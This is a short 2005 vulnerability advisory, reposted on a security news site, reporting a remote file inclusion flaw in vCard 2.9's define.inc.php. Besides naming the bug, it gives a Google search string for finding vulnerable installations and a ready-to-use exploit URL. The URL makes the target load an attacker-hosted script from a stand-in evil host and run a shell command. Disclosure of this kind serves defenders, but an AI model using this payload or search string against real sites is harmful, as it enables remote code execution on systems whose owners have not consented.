Computer Security

Security Advisory: Remote File Inclusion in vCard :)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  Portcullis Security Advisory - Movable Type

  Secunia Research: cPanel Entropy Chat Script Insertion Vulnerability

  [Full-disclosure] Invision Power Board Privilege Escalation (2.0.1 + more)

  [SA17359] vBulletin Image Script Insertion Vulnerability

From:x_(at)_hotmail.com <x_(at)_hotmail.com>
Date:31.10.2005
Subject:Remote File Inclusion in vCard :)


Remote File Inclusion in :-
--------------------------

vCard

Date :-
------

26/10/2005

version :-
---------

2.9

The bug reside in :-
-------------------

define.inc.php

And error in :-
--------------

online.inc.php


search google :-
---------------

powered by vCard 2.9 & allinurl:vCard

Exploit :-
---------

http://www.host.com/vCard/admin/define.inc.php?match=http://www.host_evil.
com/cmd.gif?&cmd=id


Discovery by [ x ]
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru